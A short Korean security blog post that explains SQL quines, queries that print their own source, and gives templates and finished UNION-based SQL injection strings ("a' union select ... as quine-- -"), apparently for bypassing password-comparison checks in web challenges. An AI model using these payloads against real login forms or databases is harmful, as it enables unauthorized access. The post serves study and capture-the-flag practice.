반응형
콰인(quine)
자기자신의 소스코드를 출력하는 프로그램
Quine SQL Query
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine;
prefix와 postfix 부분에 부가문장을 삽입하여 사용할 수 있다.
# single quotation
[prefix] select replace(replace('[prefix] select replace(replace("$",char(34),char(39)),char(36),"$") [postfix]',char(34),char(39)),char(36),'[prefix] select replace(replace("$",char(34),char(39)),char(36),"$") [postfix]') [postfix]
# double quotation
[prefix] select replace(replace("[prefix] select replace(replace('$',char(39),char(34)),char(36),'$') [postfix]",char(39),char(34)),char(36),"[prefix] select replace(replace('$',char(39),char(34)),char(36),'$') [postfix]") [postfix]
single quotation이 필요할 때는 처음 prefix 부분에만 '를 사용하고, 그 다음에는 double quotation을 사용해야 한다.
# single quotation
prefix : a' union
postfix : as quine-- -
a' union select replace(replace('a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine-- -',char(34),char(39)),char(36),'a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine-- -') as quine-- -
prefix : a' union
postfix : as quine#
a' union select replace(replace('a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine%23',char(34),char(39)),char(36),'a" union select replace(replace("$",char(34),char(39)),char(36),"$") as quine%23') as quine%23
# double quotation
prefix : a" union
postfix : as quine-- -
a" union select replace(replace("a' union select replace(replace('$',char(39),char(34)),char(36),'$') as quine-- -",char(39),char(34)),char(36),"a' union select replace(replace('$',char(39),char(34)),char(36),'$') as quine-- -") as quine-- -반응형
'security > web' 카테고리의 다른 글
| JWT (0) | 2023.11.27 |
|---|---|
| htmlentities (0) | 2023.10.28 |
| MySQL DB 명령어 (0) | 2023.10.17 |
| 정규 표현식 (0) | 2023.09.27 |
| file url schema (0) | 2023.08.20 |